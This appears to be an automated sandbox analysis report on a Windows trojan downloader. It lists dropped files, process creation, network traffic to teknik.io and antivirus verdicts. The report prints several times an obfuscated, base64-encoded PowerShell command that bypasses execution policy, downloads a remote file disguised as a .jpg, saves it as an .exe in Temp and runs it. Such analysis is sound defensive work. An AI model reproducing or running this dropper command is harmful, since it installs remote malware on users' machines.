NtAllocateVirtualMemory April 13, 2021, 4:10 p.m.	process_identifier: 4864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\eVDwACBtpW.exe

Creates a shortcut to an executable file (1 event)

file	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=

cmdline

powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\eVDwACBtpW.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\eVDwACBtpW.exe

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 13, 2021, 4:10 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (17 events)

Data received	¼
Data received	M`uCôiÏp+èNGªdlAxuÃ>É¨¸²¯·ô òGo¦Üª9GÌ$âÐ.¯~0ï¼.pC&æÀ ÿÒÏ`0\0D ¼$Ï¨søÉ`å^«OèÔK0 H÷ 0210 UUS10U Let's Encrypt10 UR30 210324141911Z 210622141911Z010U.teknik.io0Y0HÎ=HÎ=BÎ/ÎjðÖºo¤[ÿõJ.ð+r#.wÌ¹T$×î×lÇÜ(ÑiþÈ"¾YÙh¾Vh' ñg(Y²(bþ£Q0M0Uÿ0U%0++0Uÿ00UlÄ(}fëÆ\qÀìk0U#0.³·XVË®P @æ¯ÂÆ0U+I0G0!+0http://r3.o.lencr.org0"+0http://r3.i.lencr.org/0!U0.teknik.io teknik.io0LU E0C0g07+ß0(0&+http://cps.letsencrypt.org0 +ÖyõòðvDe.°îÎ¯Ä@Ø¨þ(ÀÚæ¾ØË1µ?Ó3µ¶¨xdÑrÿG0E CÂ0yÚÉ\í¼([ûC.N[v ²s¶Åå´³¨!ËäsüS0=¹×ÙæªÅ%¬zUöµGÛËGvö\/Ñw0"T0VãM3¿ß/ ÌNñdãxdÑrçG0E!ÏkãØYë{XØGç%GLû¶4x oA×qf2¬y{ .·§ýÔTè`I1öû{T~ª&¼¸ä¹õ,e=d'O¿0 H÷ QEuq·Çhåç+@=7\|IÎ3 }\|+<å"Ô ¦»ò¡ÔÓ-¢&¯«Ý½\LÖ5é4V^t¼coúè6ÏñE7ZíïkæPä)ãA\3NTõâLjlªÓÌa_~KâÎ¨G2h´ú¦ºnq7éRlÓ Ìm¦z;7ÞÐd+ïVk)A[Ì1/>h`zL¾eìªëÄ¨Ì ú@êçE^kû·ååeoÄ«·9óÕH0Bªý5ñfÔ(mÙO «±5Å.àÐÄ]ô»÷Ð -Û"y$(&UöE2i0e0M @u¤È!©Íß0 H÷ 0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 201007192140Z 210929192140Z0210 UUS10U Let's Encrypt10 UR30"0 H÷ 0 »(Ìö ÓìUÃøñ¦zB§]&ªµ+¹ÅL±¯kùuÈ£×GU5W¨¢9õ<B©Nnõ;Ã.ÛÀ°\óY8çíÏiðZ¾À$%ú7q³ç¬áïÛä;ERE©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m¥@4k+Ó¼fëf4\|úkW)ø0]ºroûÅÒX=Çç »ñ+÷ÜÁÚq]ÔFãÌ%Á¼`guf³ñ÷¢\æSÿ:¶G¥ÿê w?SùÏåõ¦p¯c¤ÿ³ÜS§þH¡i®%u»ÌRõíQ¡Û£h0d0Uÿ0ÿ0Uÿ0K+?0=0;+0/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0Ä§±¤{,qúÛáKuÿÄ`0TU M0K0g0?+ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -+http://crl.identrust.com/DSTROOTCAX3CRL.crl0U.³·XVË®P @æ¯ÂÆ0U%0++0 H÷ ÙLàÉõ71Û»â³ükblX·I~<·¨(aëÎà.sïIz5hðØþV/mX¦n56sÃå½m^×nrû ¸ÓWdå[ÂiÔÐ²÷\|KÃrsÜýüm½ãÉa:X}t6+U=Çc¾CÆ9¡kW?)Áö²½GËª0l·2áYT ^clûg<sÆv$Þ@ä}-fµ%£XÈêîÏi;üæÀ3óø)--~ðap]÷åÀû$úìËaÈîcq(¨,;wï^dðQÑäS\°Ô~Æ4ÒÎä±ß:Âê¾AU=á£·&ì5ã¾bíïÎjþ=ª %R>sSK£}¨Ã<ÃTù¸¥"<®Aô¼>XÏox©£qF0D ZBéÄáÎÜÃyùò/Ä±t"k¿Õ§¸3v? ;Êo©rÁH¦\þ3YãtL3b=MÙ´¡
Data received
Data received
Data received	0
Data received	÷$<úÛ!.R(8®üù¥#wý³ÚGÝ+fI Ô£zîN
Data received
Data received	k:ùEta©ÛÏùÕôì/Wut^ç:Ê8d\|
Data received	ð
Data received	qvÇQ¶º5- F©-U±MDuæjVj÷/KÄ¦¶ºõÖ¿iÃìÝdRòy~Báôþ¬½/ÜÐ ×:,(¾@º¿J[Õù]DVpË"¼Êºk%~#x;È¸Í¯e@ñ²tE3ÂT{G¶¥%æ°&zÿÄ.ôÁïv/êÆ#æGõ'9K3OæCÐâªõAj fãìúZ[óNs@ö0`-<ù Ñ~ÜL©½Eha©ª7ÊðHWMß]ÿY±0®ã3BÞô_ýØÍøÂMH±á½}äéÅÑ¥ràÁªj)Î"ÏÀç ÁhFLWhibLtÂyå>-#¦V#ÃF-oæZVV #Xâm èp×R}qä!úQr[÷jÀ@Ò£ÜÌâ?gjE¤^Ìr4ßì¾ªV9a¶zKÏÆ"§ÏoN¨ë¬yþvWG½wRôËk¾½Óç9q£^íÖÑ0óÛ£ØùÌ©¥h«Q ®ÀçÈ9ÝâexkíxÝàÕh¯1× ¢Ã÷&Û}¥l±=¸wmÈYG6²Ð¹úkÈÉ¡¥eg¹\8È;BóÈyesÞlíº¨¥RGÆUÃNmSî/Û :`ËýnØáîHÔÞIÀøóº\¢%Öó$}ÊÌót4³Ó81µ eeB ÅYÍ Ô9÷¤h,;K ªËãxiÔÈA&'y<³õMxQÊmM>ôG£àæô]Ûjd^É«kw9Ê<n¹ñ³Þù\|¹äô¦CLYÐ/µät£vk<hX1 b>ú2þY,=üòÙXi^Wë¶§é¿$%j¿W±ôçiÿ1å×Øp¾æs¶²¿úù´@í¿f%=áé!½`é;«uæðBZ»@öÎn½#El9 bPª<^q/~ßëÎÎSó³kÇ¯¹vhäò\|?³lpÉ¤\ýÆ< )ò«S¢-MÆFÒ®dêíÁ ËõtOgîø¢K t5öH£aüa(2ßªX¥KKDÀ\öT'pÐxúãsu¦?,ÿVÓÇàÏö wôÇ00E:qÚ6$hHj]´=G+Ï¦ßó'?^¹ Î1ñ¾õðh&¹àUô^î#¨>F 7üëZ7å£é&ª ;po'2B³ÏJ)Æ8#!´çµô¼(!wâ-óÍ}É-ô'£ÛàlÒ¿Ù9Q! ô ¥çnèJõëÃÇUmÞzÙDÙq÷Á_Ú¼3÷0 Þø]ÏpDÿþF;0 ¾fÈFá ¢ËV}r¼U)³<kî\øi>ÓàÀs·öªeÛ<"ÔñÖÄÇô¡1À^î©ó U4âöÕÜÿ}$'S!KÎ3gÛ£úÎjìw} éÄ8ð±qød+Ü\¿EÌ Ûï (iÄ°®Ü\|õÍÕÿ¬@`n¬É&ö?úy8VÈõGA_7i¤ÜSuehi _LÒ°UÆLøÈ bïZ÷«·E´É \¨¹t"Z?þó+7£¦n#Úõõbðí4ÊªYä´\ýÈú¶á4ÔJ¶zî{DLÎíkgq§Ñ"SÍ¹ËÖ n â}H4%sZ½]kq\ ís\|~ó Î Zu;¹Ewg9zë8 %/ \|ZþoCZÉ¤CV@iºîËhÝXÊ Ü?ç¶«ð[<;DdËK[ï¯MÂEâÛ+ãé=¿VHó>'½dt¿Ùîþ±¿aäþ¡+IX"2J9¨ÑïSìMÅÊ7YUÏCWm>ýï¨¦áá oôXC,ùtzâ!FÀ0Nw/äêâ%UéµX úbñµÞÎãÿ)«ÃxÐ¶³æ-. oéÈnÙçÿf§¨bvÝlÃHþoOÊÿÄ5ìÖÈtäEÕÄº ÄsÉ¢Ñ¨©nÑ{7K.Ô¢ï=_mËS.Ôâ`o7ù3Ô×ØÎ¾?²Âá¤«nh÷7©ÁFÏ·#®ÊïÂwrkAe0:_È1ÏûËîM¿¶½ãlrÑ6E¸LvÈSië¥ãkýµÐç?úf\Ké9;_0ÑÎÊ¶ß¥e«<X¥ÏëÂ¤rzî§:@Í -« ÉÑnuÎ}rc×Fã®_ ¼;ÏîGÂwV{s/Y#O'W"eù^òôWðòXéf0×çVûËÍ]ÛðÐÈëï§ÿ¿÷m!âPqÛìõEÎHr½l`Cu¤AÚAo9A°ªöWÄ)©í´×ÓtáUÊofD?,Y/#¢:t>àm¯,WåN"á'ínýÊqV¸õ^4"åK µÿnÉ Ù?:¬øUÕ¹IùµõP=¶/gpêÀA:E¡¯5xÒ¶úE?¢¸_ÐQUY¥\|´â ¨&G)Y$/\2ã&Þv}i øïNhzDÇá_þçG,íËéÚ£§9×ó÷Û ªLC§ÆJÎöC,E<j¿rïÌ±Î5üñÂÙwv&Xà&n×«óìEó&Ì{ªë1¯©`úmÇ2ÿæghJ+Í¸Ñr±3`á÷Ü¶X:BµÆÞÌª¨iß1Bº0°ÍÉÂ¤§¸¢zS[Mä½¹¤D¨ëýî Áñ j#oßgAõÊºè8º_\|ñÈ9h9½çÕÚIÚü[æè¦ÆXDTâ2Û:O»0ÅÌÆ$?4.òOti²Ô´<X¿¯«8;ÊtêµÄQãÇóìÛïöú[oìyß:ðJRiÛDP1ùË.\|¬°Ó%\|CZB`:¸ô{£5;¦¾ÛÅ·Â¼ææ@ü$äeÿ%Ë¨ËBeÏ%ÖEnõ×Hw7Æ5hÐn¹a«P³aõFÆ4ù ^ÊßQP =¶_k©J%ªk^h:4A/åÖ\|!WzWÊäÂ( Bù%Uyyf%Æ8ßNÂ_;}ûÝï¢P¸ÚµH^5Òp«_ò u:¬ÂsáöÜéþV×ép+l#¥2J7>D?Ú?îA@\QÚÈJe%ó{Á¨+/ú=£4¿üLuZõ§Ô\1¼¸E¶£Ãf¸ôvòT6´ÓÆ(ò\9gÑ_0Kl×Ç1 ù±Á]x¶«ä¿K7EýZ¡A8µ}¼4´Ó¹c¾K¬-°wø n ßØêÚ)@¼ùÀóbØþþú.b÷aÑÙ§ø¸àÆÜ:,;´²ô)[{#K´{íÂÎ¢6óí× ÍÓ^KÓðä?¨¿8Àø<mÏ 5¦j[õH]&uÀÂÍ´»\|ªÏEäZ»bD/SÛæëË^þÝXáBÔÐ~x«îfg(c¦ÁÌæÞ`6AâçÿLodÈÿ©;¿ùp¼íÊ8é!-'b¼Å é;´äøMû Kå]>þÉ·ÇÐòvÚZ¸LKªQy3)ôÑÐXÒ&ÿì<;1½iZ\|Áâ+nJ{³Ü¸bB@ªÁ©Z%y0ýM¢êYÝýÒ±üâ²Qüÿä°HÔyÓÉÜHÈRºôª`Ø´²-¥u'0YQ×¼è4Ò±ñKÄ6¨.ïÀ9SÃFÐ©aërÑgD<¸ó^û ¿tV®ð½ÁYu$¸¥ §5<J}QÄ¦öY¸Dùi3ý£1»ô'±qÒmX:¼ÕØ IÀûnÆz¡h¶ð@Ü·NÑ]ÎÜFè§nyì¾¢bdeÄ×Iäd¦¥ÃzeC¡t0-½o¾ó;êF¹U;Sá«\|5ù¦Ó?ÏÃ<ÙÛçeMm9ÑLëÈ"õqµÔ/Å×JïÊ+«ñÙ9ºßãÇ_Dx¿:Ò#æ½.Ã-É+=EnøóMnG¦©,¯êtIj¥VJ"â[ÑTß%µ/q';PÉà:]äÞ¥õ~òù¢$iv¶<k3pL P8@ÚÍ~·Í²çö^ícªú¢ %eU: ãÛ8wq%Ä°2kôñºbºÁät&F@ßîÈ6ÏÁJØPB=uö!¡:Aô±WJXYfÂFTÕBö! 93ØÇfå¥l©z<ß³J¬ó4÷ÊÂûSTá\|ïÌ[$Ú®÷Éß ¬LÿÇADÁÿ}±è;1ôQiÝí&Û/\|Ç÷ùìMQà¸°»ÉÍ-ÉÖ®HÏµÃ\|5T°=G¾¯éýZ¯ú· çÅÅÑÛUrR9gøËýI¸u§µ>%e_²Ä¹ÈÐò^Ð2ë;ËË7W»!G"Ø¹ëyÄ£'Zª©/IøéËòq4òÏ¡SàÃJ]GóÐÝFÑ è»~. ÓÐ(ùmj"! ¸JjH¶ë47ðÁS_i)è¾&Öææ²cWãµí¶d%f²üíyD » (=nè¿ç'¢»^»6Ý¤·¹Þk²¸ðèPÞ45s%Je°dÓõ½ý1¿X¯$`3&w½ºEc5Õ/þ¶0S¿^º.»L+»&XooAí)à&UY'+.?rkÝÌ©Ü¨ÐÅØQAæå¯g_ífP&½+F¸qÙÝVWÈõñØíÉ!¯³ÕcäM ó0$ýÁôQqlj¸/3í(ý¡}¶¶QeÚýæi±¶å§UPM»·Sð=I$½¯Æ`òë§FÏôÝÄ¹öRû¾FdJW)[âæªSÓÃpÊP(±bàDeGy"?vÒ>9Ue&ÖÊÃK`ëÁhý0UK>R
Data received	xÇ¹½AÀ_Üfîº#Y§ÜAîAü§@48 ³;Q
Data received
Data received	DLÔ¼Úõ)o6Â*`hÇøÜV¯Í;.óOV!8
Data received	Âµ§Còö%ìç×¼µE"²c" øª ;B«+ie¸þq© Íí©FsÌNÒæ ÞõÛÜd'¡8+æË¨T_ÈX/óÔ<¸¸YËØºþ./$ÆgÓß¶Éq/äòb ¡Ã®D¬zÉÎWó[ £`¯En«Qå±t¡BÅnöiî ¸×à8a~â7þõä)¦!Û¾-ÏúBõ'é¸^{GÀ\|=øÿÁ´ °dqPQW£âMý«ôøts±_/íÌ¬zsÈÌïè±ºâî_ý§ÁT[nÂO²´¿ÿHWEIwëÞlC,g)T°Ó+ñù~n$ãù1Ðj7æã4Çq¥êa¼A6Co7_µ¹©%Îèû¶TaªdôÇðRÆ>âÚË °ù&;¢$Ï£Dýqå¬#óLxÔ'¼ÚÓ Ùýn=]c5ÅíEJt¼¬¥ónQqydGVL`sµ`rDm2hcöÞ¾ÄUÎÄ0õ[gGãèa¹ªw/L;Æî¨ÿ!ø?Âø7/JûàN¿M]¶ÍAÎ¤ÙäXïìðéÞÖPáÐIîaáþ5y¹ofÒ/8 %,ðZáKPä[,°L6ÕDÌª,ÇFí ÍE®HÊ{×ÓfiBrD¨èè:ü-x¥ÎÙ\|·ª±%\gU¥ªå%¶ d©1;}'Xß1S-iÀÚú&$Û@ò¢"w»@} ëäïo1ÄÒhg@ETKua;¨SðñÙ/ÝÅ¥I«;¤ ¶¹Êú4Þ÷MIÈÂ1D7xåù ÏKK¯Õ4\|i]Á^´wöBCÌL$Õ> 4äºvekOÐÐ"3éè«14£ZIPúù¯Ûî69Ìg"wÕU¡]OYªã²t` x¥!æÝ6=ðlüñitêñ`å¸V2GE1Ö®äÎòYTÃÈÒ6oÆdeÊ\|´ÃB»vgBià¯½lßÕÄj%cz5YÒæA%Ö!°Íuá]h"¼=jÓNlàô:ÒéïP$þymÒx¬D.-»n=´£¡Y¦\|¬M©ðå×m\@KÞ8û,ïÂÖÚ®©nÁLfç®ôa+=0nõ,PÈYÝÉÖ#:[LÀhYìM£ËP,tR¸>qY2CA©#ÅMºØeøqø¤Óï£áTbìU5t"¡Y[hi ¨È@ÃO9hÁï²¶^ ø\4%ÎÅëÍU4ñ´l^È¢¸h«ñsb>0µâûYÉÓ§ò½+)<%ÒÁÝC=²Óoá°.û1çÖ:½$åÈ µGdª¾jÅ;$¾îa:n Ý/áöÒ¬Å£¡Ðõ¿b£ÃÏkUOº¯0Ñ¾£U«ÜE3CËaÆÂÉ©ÒÍä+ÆíVFÏºÎS<gR¾÷¢(ÊAõíjûÖiÊM4W8ÍÌEýNï¦è%'}ÎG§s¦ÄþäÁzZ25Ëç^±]ö¿C¿©B©j_ÿ¢³6!³l9¶v?U²®Í¡}ò®®ù8{nÄx½ ì]ôbÃj¶J¨ÜïAÑhFu6 iXîM±°O$AX§ãöØú{SÏ''r-í¸Uñ>C@>Fe¤L'ûÖãàåËtÑ·ÆôÒJåí[F{@èfv(dÒÚ£ÿ²Ì¦U~Gßbâèoÿg9ÏbÈZ©¯¹:0-+Í 6þh¦#É$5!®r5;uHXÛÈçW¸È½KgÅv_Å'øÚ(À ñ?KUVÖ}ìüwc&Z8Ü©$ÞQZÛ§© 9Qïz2@¾[ý3OrÐ]Wß ïÀíRaiÏâOósÏd¦ÚF ?ÇýØ¿¾ÃJ `é×MÃÏàsyÿó´ðUù.!åT<xÄ3ÞÖ¬YH¾51d+ ÿ=ü,,85}ÛW½±$ÓPY¡NMUX2 ¼ËÿæÁ®cÇÑhwì¾ Ñ§ÐLhFKh§jPªÚîU5añÁßPrXDÈOµðÁ,·Ît, ®¢9/Bó9¦}Bw_òºZsßoò R¿/##\ âz¿ÛEÝPÙû¬({µ¢S8ÅÕD7Íz\|'GwZ Ï>Í9Ûl¤[¹Úxë°#>t÷¬·Ë`.çs7ËBýÂOÖÁµ§b`$ç<ÜÃ"f ´+Htçncekôý¡ÍpîªzËJÌzÔ¤ÈhHÐfýS\û dOwÎÈ=h/²TC ôáqL7!Ó×_Å»$¶ÙM_ùÃX}"ßÉ9±¥Y(Îïô ÚY«¨ïÆm,nx¢cûµÐApvø¿ìz@¸Ë¦ £Sö h@½4Y$.1ÕOÙ´N×¾á×ö-tÇQ êfõîyTÖj82¼p (¼å&`þhí´ZÃªz³÷K^n;ijÈJÙW§¹qóo[n¹êKñyA«zÕ^«ÙP½¬åä+s;Ç'¯Ô½µÄ$Il§ ¥ßâªÉñà<Ç}$ð}Ð `Ä]ÛlåümÐ«×MAñ¢¾æDRQ£M{(Y`æåe(Ï[S½s¿Úÿ7»4¯öL0@o«1o<B×HlzÙ&r\ÍÛöGúêªyú6 ÷@¬òÿ`p9vq+ú0ÏÈgùëÏï y4ÿÃgK&óÛx¦ÍþdsÀCæ <8BæÈÒxq°Écüm!½@xªc» Á Y[÷ Tà%¼ÞÅ5Oóú¿Ë®ë`Ò7/e°çùr»æ®Jp,÷VTu¸âtég#Å1Ý»`sþþ ÖNþ4jÂú\jCìÝÎÀ«+ê<hXâI·JjàÇkùÌ`,Qnv¿Ps%8ªÒÄ¡]]Öì¯èÓUåÖÔV0.ú£'ñ¬®Ç@Å¼ÛÏvFëôü'î\|§1ôÕÈn<QÔ"j:½Ö KÐÍÉ!{æ½·,AÅ#½[Íx98J¢Æß~$TßXÛó¯Á&ééùuîC;¾ËâÞËBH~?Ìì»Ø.²Zkå[ãÀFÜ×B_Ë_2ð4</\|îúÊBÕ³Co; ëÕ`ê>ùT- Vì"µïbW³ö:cð§kdëeá¸S"úæ¸~²ëw g®Ë³¬½¸Åv!Áïo&\|_¤oã[G¡ Ë§'43ikw´[óz0ó5®%w¥×k»O^ÒÛ:Òü§¾'òd5«îÎ¢{ Ó4mñö{è&ÌYïGsªa,¸s&àø0 ê·b&-Ý²ª«G£ärw©xþFS¾AI» uÇ5Q¦;Ìu¢ ôêÚHJ;Z½ý-ä.Î{½IÃæqMRÇ\"ëð¬ò¾¶iªFøñSÿ !ÕüwÐêPö¦¦c%%?$>®üÑZuïÿßó3K=yÀ7Õï®/ÔÀg³£dÓå,Í-Åk"lne<49ý^Ø/°ºA9 &uâ¯/8SÇî±ëfÍcL HÚºÕ³×óxÓÖzu,^-ÒçÅ_CÓ7^P,6xCÀÞQ:£ÚxÀ%êqÝ}HsÙÓìü^T~3{\Ú»·?.&Ie;ÍSÊlÇ~å\ÒI{ø½êt7`©CXò5¦ÅX9Al(ËÌä =äö¼ònnvîoð+Æó¦Aå;²Ü 7¶ÄTF>çñÂ>G¶ýcÒ~±¿õ'ÙüOîÒÍUüsÎ=gãÏ$¿vPÞá¥ÆþÂ@(a¼8qÖ%zÒsÛ+âz½Òd1´.õSå]h¨ý\Õù÷-ÌðnMíÑôRr&GÅÐ;HW*xýWß¼7GªEK÷«²pú´D/BÜñ3:fUXùÙbA² {ÊHL w³ \;.p&©Hè4`1Ð æ¿êr÷ñ.³XO¡5°dÿR}SX+ÖXúæ¸ 6»ü«JM¸©£Zú)¤÷×4$v8ëÇ¦AÈ´ÈÓKGÂ}~dTòøtä2l+-cèTcÊÃB¨µ@TâkgC_Üu55µ cG ÄZGê=Û·Ë¦XÉ#ÙñòéM@ÀÓ¢r&°³õùäLÚ³=Iùð=é««°\|q&ÜÔ¡Ô:ôÌò`0Î(Ü5>¼Ë©©Þª½M"xPÆòCÜÐSÔï¹0B8cÌ'Ô `P{îWL?4C9WÿãôøMd1IÊéÅPA(}¯¾=y¯±Wù©8¹PðuIÁ;Ù²ï ÏhGqÏ8mJ¹G¯É&<L,[TóCt¶Çý9Uø¦e,lÿ`´ëÜ6/êev`«öº2SQ=»ËÏcdAcm1¹IefWµÆ-ªZ!ÆhæËçÎõ¹ ë+WIdQ³YC¦»]¬¶ÀGõ¤YI-ì&åæö"ÁmÂ#ü¶!r´fghgüÔ6dâj¬Ðå ¿®ÐZe[àR6
Data received	¼a¥ne@zä~ò§51EèaþP>î!T
Data received	RóðIhA':¹` ZÂLxÀBt¤Ø¸×Øeû
Data received	p

Poweshell is sending data to a remote host (3 events)

Data sent	nj`uCÝÖ´=¤Ì+E¾¦v ¡÷?¦ºû¯òà/5 ÀÀÀ À 28)ÿu.teknik.io
Data sent	FBAd£¦5ªîw_ 7{ÜçaS"Áohöe{Êì>¿swy~~ï1¦D7á¨ó±¢6yr:KOë0 §VpI¡=¸jhvÿbõÏÞ,ý*W¦ûJëØXaÕJØ8RvÇ
Data sent	`í[zjZÅ[þH§<Û¡¿?K°qIÕ#J8Lñ¡_7¯ìxà¡]Ò6¬oNg¿-+tÝÛ"!WtfxuÔ[ù<Ä6Ï4¿ÖràçCn

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 13, 2021, 4:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 13, 2021, 4:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

File has been identified by 10 AntiVirus engines on VirusTotal as malicious (10 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.9fbd32c6bb25f6a6
Cyren	W32/AutoIt.UF.gen!Eldorado
APEX	Malicious
Kaspersky	UDS:Trojan.Win32.PoverTel
McAfee-GW-Edition	BehavesLike.Win32.TrojanAitInject.ch
Sophos	ML/PE-A
Microsoft	Trojan:Win32/Predator!ml
Malwarebytes	Trojan.Downloader.AutoIt
Cybereason	malicious.d36792

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send April 13, 2021, 4:10 p.m.	buffer: nj`uCÝÖ´=¤Ì+E¾¦v ¡÷?¦ºû¯òà/5 ÀÀÀ À 28)ÿu.teknik.io socket: 1440 sent: 115	1	115
send April 13, 2021, 4:10 p.m.	buffer: FBAd£¦5ªîw_ 7{ÜçaS"Áohöe{Êì>¿swy~~ï1¦D7á¨ó±¢6yr:KOë0 §VpI¡=¸jhvÿbõÏÞ,ý*W¦ûJëØXaÕJØ8RvÇ socket: 1440 sent: 134	1	134
send April 13, 2021, 4:10 p.m.	buffer: `í[zjZÅ[þH§<Û¡¿?K°qIÕ#J8Lñ¡_7¯ìxà¡]Ò6¬oNg¿-+tÝÛ"!WtfxuÔ[ù<Ä6Ï4¿ÖràçCn socket: 1440 sent: 101	1	101

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\eVDwACBtpW.exe"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\eVDwACBtpW.exe

Creates a suspicious Powershell process (2 events)

option	-executionpolicy bypass				value	Attempts to bypass execution policy
option	-executionpolicy bypass				value	Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\eVDwACBtpW.exe

pkM3T.jpg

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All